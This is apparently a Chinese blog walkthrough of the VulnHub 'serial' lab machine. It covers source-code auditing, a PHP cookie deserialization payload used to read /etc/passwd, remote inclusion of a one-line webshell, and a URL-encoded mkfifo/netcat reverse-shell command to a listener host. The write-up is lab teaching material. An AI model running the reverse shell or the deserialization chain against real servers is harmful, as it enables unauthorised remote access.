serial---- vulnhub打靶

1.新建虚拟机,虚拟硬盘使用vulnhub下载提供的虚拟硬盘文件
2.打开虚拟机,扫描网段,确定IP(或者arp -a)
3.发现没有robots.txt,以及一些常见admin,www.zip目录文件,尝试扫目录

拿另一个工具扫一下看看多了一个

4.发现备份文件目录,下载源码
5.分析源码发现关键点在log.class.php中handler方法。可以尝试远程文件包含,并且index.php可以尝试反序列化

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

经过代码审计可构造payload,尝试读取passwd文件,payload如下

在本地开个小皮 在www下打开这个payload

base64解码 CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码 (hiencode.com)

然后用burpsuite抓包

发送到重放器 修改cookie为刚才构造的payload.php 的etc/password编码后的结果

7.构造远程包含payload

既然存在文件包含,可以试一下远程文件包含,在本机网站根目录写了一个shell.txt脚本

然后在修改paylod.php尝试读取本地www目录下的shell.txt 里面的脚本

然后再访问一下paylod.php 将这个再去bp更换一下

成功执行一句话木马

7.反弹shell

kali开启监听 尝试回弹一个shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.233.139+9090+>/tmp/f

🆗了

相关推荐
随性而行3601 小时前
微信API接口与AI自动化:开发者的实现思路
运维·服务器·开发语言·人工智能·微信·自动化
胖兔纸23 小时前
OpenStack 1.7.2 & Ceph 9.2.1 运维命令
运维·ceph·openstack
不会C语言的男孩3 小时前
Docker 在嵌入式设备中的常用玩法
运维·docker·容器
ylscode3 小时前
CVE-2026-31694 漏洞深度分析:Linux 内核 FUSE 组件存在本地提权风险,普通用户可直取 root 权限
linux·运维·服务器
智脑API平台4 小时前
Codex CLI 怎么用 .env 配置 API Key?本地项目和自动化脚本接入教程
运维·自动化
weixin_307779135 小时前
Linux下Docker Compose里运行的MySQL数据库故障诊断Shell脚本
linux·运维·mysql·docker·自动化
流浪0016 小时前
Git篇(三):吃透远程协作:SSH 密钥、分支、标签全流程实战指南
运维·git·ssh
编程令我快乐6 小时前
windows单次传linux文件太大
linux·运维·服务器
FoldWinCard6 小时前
D4 Linux 进程 内存 等命令
linux·运维·服务器
番茄育学园7 小时前
2026表格自动化工具实测:四个不同方案,适配不同办公场景
运维·自动化